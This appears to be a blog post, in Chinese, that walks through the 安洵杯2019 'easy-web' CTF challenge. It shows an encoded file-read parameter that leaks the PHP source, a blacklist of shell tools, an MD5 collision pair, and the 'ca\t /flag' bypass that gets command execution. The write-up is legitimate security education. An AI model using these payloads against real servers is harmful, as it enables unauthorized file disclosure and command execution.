
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <title>安洵杯2019-easy-web | 66+144</title>
    <meta name="author" content="LUEFLAM" />
    <meta name="description" content="" />
    <meta name="keywords" content="" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
    <link rel="icon" href="/MIA/images/bloodykitty.jpg" />
    <link rel="preconnect" href="https://cdn.staticfile.org" />
<script src="https://cdn.staticfile.org/vue/3.3.4/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/6.4.0/css/all.min.css" />
<link rel="preconnect" href="https://fonts.loli.net" />
<link rel="preconnect" href="https://gstatic.loli.net" crossorigin />
<link rel="stylesheet" href="https://fonts.loli.net/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap" />
<script> const mixins = {}; </script>

<script src="https://polyfill.io/v3/polyfill.min.js?features=default"></script>


<script src="https://cdn.staticfile.org/highlight.js/11.8.0/highlight.min.js"></script>
<script src="https://cdn.staticfile.org/highlightjs-line-numbers.js/2.8.0/highlightjs-line-numbers.min.js"></script>
<link
    rel="stylesheet"
    href="https://cdn.staticfile.org/highlight.js/11.8.0/styles/github.min.css"
/>
<script src="/MIA/js/lib/highlight.js"></script>



<script src="/MIA/js/lib/preview.js"></script>









<link rel="stylesheet" href="/MIA/css/main.css" />

<meta name="generator" content="Hexo 6.3.0"></head>
<body>
    <div id="layout">
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>加载过慢请开启缓存 浏览器默认开启</p>
                    <img src="/MIA/images/loading.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/MIA/">
            <span>66+144</span>
        </a>
        
        <a href="/MIA/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/MIA/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/MIA/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/MIA/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/MIA/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;66+144</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/MIA/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/MIA/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                    </div>
                </a>
                
                <a href="/MIA/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                    </div>
                </a>
                
                <a href="/MIA/categories">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-bookmark fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                    </div>
                </a>
                
                <a href="/MIA/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article">
    <div>
        <h1>安洵杯2019-easy-web</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2023/10/29
        </span>
        
        <span class="category">
            <a href="/MIA/categories/CTF-Middle/">
                <span class="icon">
                    <i class="fa-solid fa-bookmark fa-fw"></i>
                </span>
                CTF_Middle
            </a>
        </span>
        
        
        <span class="tags">
            <span class="icon">
                <i class="fa-solid fa-tags fa-fw"></i>
            </span>
            
            
            <span class="tag">
                
                <a href="/MIA/tags/CTF/" style="color: #00a596">CTF</a>
            </span>
            
            <span class="tag">
                
                <a href="/MIA/tags/MD5/" style="color: #CD5C5C">MD5</a>
            </span>
            
        </span>
        
    </div>
    
    <div class="content" v-pre>
        <p><font size=1>一个比较有趣的题目</font><br>打开抓包的时候那个<code>cmd=</code>过于耀眼，所以尝试了<code>cmd=dir</code>，不过都没有什么，结果倒是多打了一个<code>;</code>得到forbid的响应。旁边响应还有一个耀眼的<code>base64</code>。后面那串应该就是Base64编码过的。</p>
<span id="more"></span>

<h1 id="base64-hex"><a href="#base64-hex" class="headerlink" title="base64&amp;hex"></a>base64&amp;hex</h1><pre><code class="http">GET /index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd= HTTP/1.1
</code></pre>
<p>进行那段看似乱码的字符串的解码。一个个尝试下了，base64<br><code>TXpVek5UTTFNbVUzTURabE5qYz0</code>-&gt;<code>MzUzNTM1MmU3MDZlNjc=</code>-&gt;<code>3535352e706e67</code><br>再通过HEX解码得到<code>555.png</code>。</p>
<p>访问该图片，发现就是那个熊猫哭泣图。<br>所以回到之前那个Base64编码过的很长的“乱码”——就是这个图片的内容。</p>
<p>可能存在文件包含漏洞。<br>按照找个<code>555.png</code>的编码模式对<code>index.php</code>进行编码，也就是先HEX再两次Base64。不过翻到官方文档使用了python进行编码，觉得很有意思：</p>
<pre><code class="python">import binascii
import base64
filename = input().encode(encoding=&#39;utf-8&#39;)
hex = binascii.b2a_hex(filename)
base1 = base64.b64encode(hex)
base2 = base64.b64encode(base1)
print(base2.decode())
</code></pre>
<p>编码结果为<code>TmprMlpUWTBOalUzT0RKbE56QTJPRGN3</code>,再次发送，就会得到<code>index.php</code>内容经过base64编码后的内容，解码一下就行了</p>
<hr>
<hr>
<h1 id="Crack-form-MD5"><a href="#Crack-form-MD5" class="headerlink" title="Crack form MD5"></a>Crack form MD5</h1><pre><code class="php">//index.php
&lt;?php
error_reporting(E_ALL || ~ E_NOTICE);//将所有错误和警告都输出，忽略NOTICE级别错误。
header(&#39;content-type:text/html;charset=utf-8&#39;);
$cmd = $_GET[&#39;cmd&#39;];
if (!isset($_GET[&#39;img&#39;]) || !isset($_GET[&#39;cmd&#39;]))//检查是否存在img和cmd参数
    header(&#39;Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=&#39;);//不存在就重定向到该页面
$file = hex2bin(base64_decode(base64_decode($_GET[&#39;img&#39;])));//将img参数进行编/解码后存储到$file中

$file = preg_replace(&quot;/[^a-zA-Z0-9.]+/&quot;, &quot;&quot;, $file);//通过正则将文件中非字母、数字字符全部替换为空
if (preg_match(&quot;/flag/i&quot;, $file)) &#123;
    echo &#39;&lt;img src =&quot;./ctf3.jpeg&quot;&gt;&#39;;
    die(&quot;xixi～ no flag&quot;);
&#125; else &#123;
    $txt = base64_encode(file_get_contents($file));//否则进行输出
    echo &quot;&lt;img src=&#39;data:image/gif;base64,&quot; . $txt . &quot;&#39;&gt;&lt;/img&gt;&quot;;
    echo &quot;&lt;br&gt;&quot;;
&#125;
echo $cmd;
echo &quot;&lt;br&gt;&quot;;
//通过正则进行black list检查
if (preg_match(&quot;/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\&#39;|\&quot;|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\&#123;|\&#125;|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|&#123;|&#125;|\(|\)|-|&lt;|&gt;/i&quot;, $cmd)) &#123;
    echo(&quot;forbid ~&quot;);
    echo &quot;&lt;br&gt;&quot;;
&#125; else &#123;
    //否则进行MD5碰撞：首先比较POST请求中的a和b参数是否相等，然后比较它们的MD5哈希值是否相等。如果两个条件都满足，则执行$cmd命令，并输出结果；否则输出&quot;md5 is funny ~&quot;。
    if ((string)$_POST[&#39;a&#39;] !== (string)$_POST[&#39;b&#39;] &amp;&amp; md5($_POST[&#39;a&#39;]) === md5($_POST[&#39;b&#39;])) &#123;
        echo `$cmd`;
    &#125; else &#123;
        echo (&quot;md5 is funny ~&quot;);
    &#125;
&#125;
</code></pre>
<p>看完其实可以得知的是，要用POST传参</p>
<h2 id="first-problem-MD5碰撞"><a href="#first-problem-MD5碰撞" class="headerlink" title="first problem: MD5碰撞"></a>first problem: MD5碰撞</h2><p>参考这个——<a href=https://www.jianshu.com/p/c9089fd5b1ba>MD5碰撞的一些例子</a><br>进行URL编码</p>
<pre><code>a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&amp;b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</code></pre>
<h2 id="second-problem-绕过黑名单"><a href="#second-problem-绕过黑名单" class="headerlink" title="second problem: 绕过黑名单"></a>second problem: 绕过黑名单</h2><blockquote>
<p>dir 命令最基本的用途是列出当前目录的内容，最简单的使用方式是不带任何参数和选项，直接键入 dir，然后回车，默认就会列出当前目录中的内容</p>
</blockquote>
<h2 id="dir-20555-png-bj-png-ctf3-jpeg-index-php"><a href="#dir-20555-png-bj-png-ctf3-jpeg-index-php" class="headerlink" title="dir%20555.png  bj.png  ctf3.jpeg  index.php"></a><code>dir%20</code><br><code>555.png  bj.png  ctf3.jpeg  index.php</code></h2><blockquote>
<p>&#x2F;表示目录，没有特别指明则输出所有目录名</p>
</blockquote>
<p><code>dir%20/</code></p>
<pre><code>bin   dev  flag  lib	media  opt   root  sbin  sys  usr
boot  etc  home  lib64	mnt    proc  run   srv	 tmp  var
</code></pre>
<hr>
<blockquote>
<p>cat（英文全拼：concatenate）命令用于连接文件并打印到标准输出设备上。</p>
</blockquote>
<p><code>ca\t%20/flag</code><br>得到flag</p>
<hr>
<h1 id="ファンワイ"><a href="#ファンワイ" class="headerlink" title="ファンワイ"></a>ファンワイ</h1><p><a href=https://github.com/iamjazz/Md5collision>MD5碰撞生成生成器</a></p>
<pre><code class="python">//MD5碰撞生成字典
class batch_Md5():
    def one_md5_encode(self, string):
        md5_data = hashlib.md5()
        md5_data.update(string.encode(&quot;utf-8&quot;))
        print(string +&quot; ===&gt; &quot;+md5_data.hexdigest())

    def batch_md5_encode(self, file, outfile):
        for strtmp in file:
            strtmp = strtmp.replace(&quot;\n&quot;, &quot;&quot;)
            time.sleep(1)
            try:
                md5_data = hashlib.md5()
                md5_data.update(str(strtmp).encode(&quot;utf-8&quot;))
                res = md5_data.hexdigest()
                with open(outfile, &quot;a&quot;) as fw:
                    fw.writelines(str(res) + &quot;\n&quot;)
                print(strtmp +&quot; ===&gt; &quot;+res)
            except Exception as e:
                print(&quot;md5加密超时！&quot;)
        return res

if(__name__ == &quot;__main__&quot;):
    title()
    parser = argparse.ArgumentParser(description=&quot;Made md5 Dicts Script&quot;)
    parser.add_argument(
        &#39;-s&#39;, &#39;--string&#39;, type=str, metavar=&quot;&quot;,
        help=&#39;Please input strings to md5 encode. eg: afei&#39;
    )
    parser.add_argument(
        &#39;-f&#39;, &#39;--file&#39;, type=argparse.FileType(&#39;r&#39;), metavar=&quot;&quot;,
        help=&#39;Please input file path for batch encode. eg: c:/str.txt&#39;
    )
    parser.add_argument(
        &#39;-o&#39;, &#39;--outfile&#39;, metavar=&quot;&quot;,
        help=&quot;Please input path for output file. eg：c:/output.txt&quot;
    )
    args = parser.parse_args()
    run = batch_Md5()
    if args.string:
        run.one_md5_encode(args.string)
        exit()
    if args.file:
        run.batch_md5_encode(args.file, args.outfile)
    else:
        print(&quot;请输入-h选项查看用法！&quot;)
</code></pre>

    </div>
    
    
    
    
    
    
    
</div>

            <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2023 66+144
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;LUEFLAM
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/MIA/js/main.js"></script>
    
    




    
</body>
</html>
